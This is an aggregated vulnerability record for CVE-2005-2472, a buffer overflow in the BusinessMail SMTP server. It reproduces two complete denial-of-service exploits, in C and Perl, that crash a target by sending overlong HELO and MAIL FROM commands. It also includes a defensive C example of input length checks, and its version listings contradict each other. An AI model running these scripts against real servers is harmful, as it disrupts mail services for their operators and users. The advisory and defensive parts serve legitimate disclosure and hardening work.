CVE-2005-2472
CVSS 5.0
Published: 2005-08-05 00:00:00
Revised: 2016-10-17 23:27:40

[Original] Multiple buffer overflows in BusinessMail 4.60.00 allow remote attackers to cause a denial of service (application crash) via a long string to SMTP (1) HELO or (2) MAIL FROM commands.


[CNNVD] NetCPlus BusinessMail Multiple Remote Buffer Overflow Vulnerabilities (CNNVD-200508-057)

        BusinessMail 4.60.00 contains multiple buffer overflow vulnerabilities. A remote attacker can cause a denial of service (application crash) by sending a long string as the argument of the SMTP (1) HELO or (2) MAIL FROM command.

- CVSS (base score)

CVSS score: 5.0 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Access complexity: [--]
Access vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2472
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2472
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200508-057
(official data source) CNNVD

- Other links and resources

http://lists.grok.org.uk/pipermail/full-disclosure/2005-August/035647.html
(PATCH)  FULLDISC  20050801 Buffer overflow in BusinessMail email server system 4.60.00
http://marc.info/?l=bugtraq&m=112291456305261&w=2
(UNKNOWN)  BUGTRAQ  20050801 Buffer overflow in BusinessMail email server system 4.60.00
http://reedarvin.thearvins.com/20050730-01.html
(PATCH)  MISC  http://reedarvin.thearvins.com/20050730-01.html
http://securitytracker.com/id?1014602
(UNKNOWN)  SECTRACK  1014602
http://www.securityfocus.com/bid/14434
(UNKNOWN)  BID  14434
http://xforce.iss.net/xforce/xfdb/21636
(UNKNOWN)  XF  businessmail-smtp-dos(21636)

- Vulnerability information

NetCPlus BusinessMail Multiple Remote Buffer Overflow Vulnerabilities
Severity: Medium   Type: Buffer overflow
Published: 2005-08-05 00:00:00   Updated: 2005-10-20 00:00:00
Attack vector: Remote
        BusinessMail 4.60.00 contains multiple buffer overflow vulnerabilities. A remote attacker can cause a denial of service (application crash) by sending a long string as the argument of the SMTP (1) HELO or (2) MAIL FROM command.

- Advisory and patch

        The vendor has released an upgrade that fixes this issue. Patch download:
        NetcPlus BusinessMail 4.60
        NetcPlus bm470f.exe
        http://www.netcplus.com/pub/downloads/bm470f.exe

- Vulnerability information (1126)

BusinessMail Server <= 4.60.00 Remote Denial of Service Exploit (EDBID:1126)
Platform: windows   Type: dos
Date: 2005-08-01   Verified
Author: Kozan
Vulnerable app: N/A
/*****************************************************************

BusinessMail Server Remote Denial of Service Exploit by Kozan
( Based on Reed Arvin's code in perl )

Application: BusinessMail Server 4.60.00
Vendor: www.netcplus.com

Discovered by:  Reed Arvin
Exploit Coded by: Kozan
Credits to ATmaCA,  Reed Arvin
Web: www.spyinstructors.com
Mail: kozan@spyinstructors.com

*****************************************************************/

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>

#pragma comment(lib,"ws2_32.lib")

char Buff[] =
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";

/* Buff above is 25 lines of 20 'A's = 500 bytes, roughly the 512-byte
   probe used in Reed Arvin's original Perl proof of concept. */

int main(int argc, char *argv[])
{
       fprintf(stdout, "BusinessMail Server Remote Denial of Service Exploit by Kozan\n");
       fprintf(stdout, "Discovered by: Reed Arvin\n");
       fprintf(stdout, "Exploit Coded by: Kozan\n");
       fprintf(stdout, "Credits to ATmaCA, Reed Arvin\n\n");
       fprintf(stdout, "www.spyinstructors.com - kozan@spyinstructors.com\n");

       if(argc<2)
       {
               fprintf(stderr, "\n\nUsage: %s [Target IP]\n\n", argv[0]);
               return -1;
       }
       WSADATA wsaData;
       SOCKET sock;

       /* WSAStartup returns 0 on success and a positive error code on
          failure, so the original "< 0" test could never detect an error. */
       if( WSAStartup(0x0101,&wsaData) != 0 )
       {
               fprintf(stderr, "Winsock error!\n");
               return -1;
       }

       sock = socket(AF_INET,SOCK_STREAM,0);
       if( sock == INVALID_SOCKET )
       {
               fprintf(stderr, "Socket error!\n");
               WSACleanup();
               return -1;
       }

       struct sockaddr_in addr;

       addr.sin_family = AF_INET;
       addr.sin_port = htons(25);
       addr.sin_addr.s_addr = inet_addr(argv[1]);
       memset(&(addr.sin_zero), '\0', 8);

       if( addr.sin_addr.s_addr == INADDR_NONE )
       {
               fprintf(stderr, "Invalid target IP: %s\n", argv[1]);
               closesocket(sock);
               WSACleanup();
               return -1;
       }

       fprintf(stdout, "Connecting to %s ...\n", argv[1]);

       if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == SOCKET_ERROR )
       {
               fprintf(stderr, "Connection failed!\n");
               closesocket(sock);
               WSACleanup();
               return -1;
       }

       fprintf(stdout, "Connected.\n");

       /* 1024 bytes is enough for "HELO " / "MAIL FROM:" + 500 bytes + CRLF. */
       char szBuf1[1024], szBuf2[1024];

       wsprintf(szBuf1, "HELO %s\r\n", Buff);
       wsprintf(szBuf2, "MAIL FROM:%s\r\n", Buff);

       fprintf(stdout, "Sending HELO ...\n");

       if( send(sock,szBuf1,(int)strlen(szBuf1),0) == SOCKET_ERROR )
       {
               fprintf(stderr, "HELO string could not be sent!\n");
               closesocket(sock);
               WSACleanup();
               return -1;
       }

       fprintf(stdout, "Sending MAIL FROM ...\n");

       if( send(sock,szBuf2,(int)strlen(szBuf2),0) == SOCKET_ERROR )
       {
               fprintf(stderr, "MAIL FROM string could not be sent!\n");
               closesocket(sock);
               WSACleanup();
               return -1;
       }

       fprintf(stdout, "Operation completed...\n");
       closesocket(sock);
       WSACleanup();

       return 0;
}

// milw0rm.com [2005-08-01]

- Vulnerability information (1164)

BusinessMail <= 4.60.00 Remote Buffer Overflow Exploit (EDBID:1164)
Platform: windows   Type: dos
Date: 2005-07-30   Verified
Author: Reed Arvin
Vulnerable app: N/A
#===== Start BusMail_SMTPDOS.pl =====
#
# Usage: BusMail_SMTPDOS.pl <ip>
#        BusMail_SMTPDOS.pl 127.0.0.1
#
# BusinessMail email server system 4.60.00
#
# Download:
# http://www.netcplus.com/
#
##########################################

use IO::Socket;
use strict;

# Bail out early instead of connecting to an undefined host.
die "Usage: $0 <ip>\n" unless defined $ARGV[0];

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "25",
                                    Proto    => "TCP"))
{
        print "Attempting to kill BusinessMail SMTP server at $ARGV[0]:25...\n";

        sleep(1);

        print $socket "HELO " . "A" x 512 . "\r\n";

        sleep(1);

        print $socket "MAIL FROM:" . "A" x 512 . "\r\n";

        close($socket);
}
else
{
        print "Cannot connect to $ARGV[0]:25\n";
}
#===== End BusMail_SMTPDOS.pl =====

# milw0rm.com [2005-07-30]

- Vulnerability information

ID: 18407
Title: BusinessMail SMTP Multiple Command Remote Overflow DoS
Classification: Remote / Network Access, Denial of Service, Input Manipulation
Impact: Loss of Integrity, Loss of Availability
Exploit: Public

- Vulnerability description

BusinessMail SMTP contains a flaw that may allow a remote attacker to crash the service. The issue is due to the SMTP HELO and MAIL FROM commands not properly sanitizing user input. By providing overly long strings to either command, the service will crash requiring restart.

- Timeline

2005-08-01 Unknown
2005-08-01 Unknown

- Solution

Upgrade to version 4.7 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Credits

- Vulnerability information

NetCPlus BusinessMail Multiple Remote Buffer Overflow Vulnerabilities
Class: Boundary Condition Error   BID: 14434
Remote: Yes   Local: No
Published: 2005-07-31 12:00:00   Updated: 2007-06-04 08:50:00
Discovery is credited to Reed Arvin <reedarvin@gmail.com>.

- Affected versions

NetcPlus BusinessMail 4.60
NetcPlus BusinessMail 4.70

- Not affected versions

NetcPlus BusinessMail 4.70

- Discussion

BusinessMail is affected by multiple remote buffer-overflow vulnerabilities because the software fails to perform boundary checks. Remote attackers may be able to execute machine code in the context of the server process.

BusinessMail 4.60 is reportedly vulnerable; other versions may be affected as well.
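The missing boundary check described above, and the "overly long strings to HELO / MAIL FROM" mechanism in the description section, as an added example (this is not code from the advisory, from NetcPlus, or from the exploit authors; BusinessMail's source is not public and the exact overflowed buffer is not reported). helo_vulnerable is a hypothetical reconstruction of the bug shape and is never called; smtp_check_line is the hardened form, which enforces the RFC 5321 line and argument limits before anything is copied. All buffer sizes and function names are assumptions. check_flood builds lines of the same shape the two PoCs send (prefix + N 'A's + CRLF) so the reader can see which check catches the 512-byte and 500-byte probes.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Budget from RFC 5321 section 4.5.3.1: the minimums a server must accept.
 * Anything larger than the receive buffer is refused with a 5xx reply
 * instead of being copied. */
#define SMTP_MAX_LINE   512   /* command line including CRLF (4.5.3.1.4) */
#define SMTP_MAX_DOMAIN 255   /* HELO/EHLO argument (4.5.3.1.2)          */
#define SMTP_MAX_PATH   256   /* reverse-path / forward-path (4.5.3.1.3)  */

enum smtp_verdict {
    SMTP_OK = 0,
    SMTP_LINE_TOO_LONG,   /* reply 500, nothing copied */
    SMTP_ARG_TOO_LONG,    /* reply 501, nothing copied */
    SMTP_SYNTAX           /* unknown verb or empty argument */
};

/* Vulnerable shape (hypothetical reconstruction, never called here): a fixed
 * stack buffer filled by strcpy from the client-controlled argument, so a
 * 512-byte HELO argument runs past the end and crashes the service. */
void helo_vulnerable(const char *arg)
{
    char domain[64];
    strcpy(domain, arg);
    printf("250 Hello %s\n", domain);
}

struct cmd_limit { const char *prefix; size_t max_arg; };

static const struct cmd_limit limits[] = {
    { "HELO ",      SMTP_MAX_DOMAIN },
    { "EHLO ",      SMTP_MAX_DOMAIN },
    { "MAIL FROM:", SMTP_MAX_PATH   },
    { "RCPT TO:",   SMTP_MAX_PATH   },
};

/* Case-insensitive prefix match; SMTP verbs are case-insensitive. */
static int has_prefix_ci(const char *s, const char *prefix)
{
    for (; *prefix; s++, prefix++)
        if (toupper((unsigned char)*s) != (unsigned char)*prefix)
            return 0;
    return 1;
}

/* Hardened handler: check the raw line length and the per-command argument
 * length first, and only then copy the argument into the caller's buffer. */
enum smtp_verdict smtp_check_line(const char *line, char *arg, size_t arg_sz)
{
    size_t len = strlen(line);
    if (len > SMTP_MAX_LINE)
        return SMTP_LINE_TOO_LONG;
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;                                   /* strip CRLF */

    for (size_t i = 0; i < sizeof limits / sizeof limits[0]; i++) {
        size_t plen = strlen(limits[i].prefix);
        if (len < plen || !has_prefix_ci(line, limits[i].prefix))
            continue;
        size_t alen = len - plen;
        if (alen == 0)
            return SMTP_SYNTAX;
        if (alen > limits[i].max_arg || alen >= arg_sz)
            return SMTP_ARG_TOO_LONG;            /* rejected before any copy */
        memcpy(arg, line + plen, alen);
        arg[alen] = '\0';
        return SMTP_OK;
    }
    return SMTP_SYNTAX;
}

/* Builds "<prefix>AAA...A\r\n" with n_fill 'A's (512 in the Perl PoC, 500 in
 * the C port) and returns the hardened handler's verdict for it. */
enum smtp_verdict check_flood(const char *prefix, size_t n_fill)
{
    char line[1024], arg[SMTP_MAX_LINE + 1];
    size_t plen = strlen(prefix);
    if (plen + n_fill + 3 > sizeof line)
        return SMTP_LINE_TOO_LONG;
    memcpy(line, prefix, plen);
    memset(line + plen, 'A', n_fill);
    memcpy(line + plen + n_fill, "\r\n", 3);
    return smtp_check_line(line, arg, sizeof arg);
}

int main(void)
{
    static const char *const names[] = { "OK", "LINE_TOO_LONG", "ARG_TOO_LONG", "SYNTAX" };
    char arg[SMTP_MAX_LINE + 1];
    printf("HELO mail.example.com    -> %s\n",
           names[smtp_check_line("HELO mail.example.com\r\n", arg, sizeof arg)]);
    printf("HELO + 512 A (Perl PoC)  -> %s\n", names[check_flood("HELO ", 512)]);
    printf("HELO + 500 A (C PoC)     -> %s\n", names[check_flood("HELO ", 500)]);
    printf("MAIL FROM: + 512 A       -> %s\n", names[check_flood("MAIL FROM:", 512)]);
    return 0;
}
```

The 512-byte probes exceed the 512-octet line limit once the verb and CRLF are added, so they are refused on raw length alone; the 500-byte HELO fits the line limit and is caught by the 255-octet domain limit instead. Either way the check runs before memcpy, which is the property the vulnerable handler lacks.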

- Exploit

A proof of concept is available.

Currently we are not aware of any working exploits for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:vuldb@securityfocus.com.

- Solution

The vendor reports that version 4.70 addresses this issue. Contact the vendor for more information.

- References
